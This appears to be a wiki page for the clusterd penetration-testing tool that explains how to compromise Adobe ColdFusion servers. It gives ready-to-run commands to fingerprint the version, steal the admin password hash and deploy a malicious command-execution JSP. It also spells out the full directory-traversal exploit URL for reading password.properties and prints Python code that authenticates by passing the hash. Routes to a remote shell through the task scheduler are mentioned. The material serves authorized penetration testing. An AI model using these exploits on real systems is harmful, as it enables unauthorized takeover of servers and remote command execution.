-
Notifications
You must be signed in to change notification settings - Fork 196
Coldfusion
ColdFusion is Adobe's web development framework. It supports Java JSP's and Adobe's own CFML (ColdFusion Markup Language). ColdFusion has been plagued with major security issues in the not too distant past. The following provides a quick breakdown:
- CF v9: Trivial authentication bypass on the Admin interface
- CF v6-10: Unauthenticated administrative "hash retrieval" attack
- CF v8: Unauthenticated remote command execution
- CF v6-9: Pass the hash style authentication
If access to the administrative interface can be gained, it is almost guaranteed that remote command execution will follow. Helping with this is the fact that the administrative interface doesn't require a username, only the password.
Clusterd supports all of the above attack vectors.
The easiest way to fingerprint which version of ColdFusion is running on the remote server is to use the clusterd modules. Slightly different images are used in the various versions of CF, clusterd contains the hashes of various images which are unique to each version. The URL for the administrative interface can be identified at:
http://<host>:<port>/CFIDE/administrator/
To use the clusterd fingerprint module to identify the version, run:
sudo python clusterd.py -a coldfusion -i localhost -p 80
The most reliable way (most version independent) to attack ColdFusion is to combine the hash retrieval attack with pass the hash authentication and then deploy a malicious file to the server. To retrieve the admin hash using clusterd, use:
sudo python clusterd.py -a coldfusion -i localhost -p 80 --cf-hash
Once the hash has been retrieved, we may use clusterd to deploy a malicious JSP:
sudo python clusterd.py -a coldfusion -i localhost -p 80 --deploy ./src/lib/resources/cmd.jsp --deployer schedule_job --usr-auth <hash>
In the event that this fails, attacks may always be performed manually. Full details can be found in Attacking Adobe ColdFusion, the following provides a brief overview.
The administrative password hash retrieval is simply a directory traversal vulnerability that allows for local file disclosure. In this case we are interested in the ColdFusion admin properties file containing the hash. The following URL can be used to exploit this vulnerability where must be replaced with the local filesystem path to a target file:
http://<host>:<port>/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=<path>&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
The file containing the administrative password hash is password.properties and its exact location depends on the OS, ColdFusion version, and installation path of ColdFusion. Clusterd takes care of all of these messy details. If you need to exploit this manually, the paths can be found in fetch_hashes.py.
Authentication to ColdFusion manually using "pass the hash" is a bit of a pain. The relevant code for construction of the authentication request has been extracted from clusterd and included here to demonstrate the method. In practice, if access to the admin console is required, simply proxy clusterd through BURP and intercept the cookies included with the authentication response:
def attemptPTH(url, usr_auth):
""" In vulnerable instances of CF7-9, you can use --cf-hash to obtain
the remote server's hash and pass it.
"""
utility.Msg("Attempting to pass the hash..", LOG.DEBUG)
usr = None
pwhsh = None
if ':' in usr_auth:
(usr, pwhsh) = usr_auth.split(':')
else:
(usr, pwhsh) = "admin", usr_auth
salt = _salt(url)
hsh = hmac.new(salt, pwhsh, sha1).hexdigest().upper()
data = {"cfadminPassword" : hsh,
"requestedURL" : "/CFIDE/administrator/enter.cfm?",
"cfadminUserId" : usr,
"salt" : salt,
"submit" : "Login"
}
try:
res = utility.requests_post(url, data=data)
if res.status_code is 200 and len(res.history) > 0:
utility.Msg("Sucessfully passed the hash", LOG.DEBUG)
return (dict_from_cookiejar(res.history[0].cookies), None)
except Exception, e:
utility.Msg("Error authenticating: %s" % e, LOG.ERROR)
With access to the administrative interface, the easiest way to gain a remote shell is to abuse the "task scheduler" to run a job. This was covered fairly thoroughly by Chris Gates: http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers
In the event that nothing above is working, it may be possible to abuse a "local file inclusion" vulnerability in CF6-8.
Another option is database log injection as described in http://breenmachine.blogspot.com/2013/03/cool-coldfusion-post-exploitation.html . This attack has not been thoroughly tested and it is unclear which versions would be vulnerable other than CF9.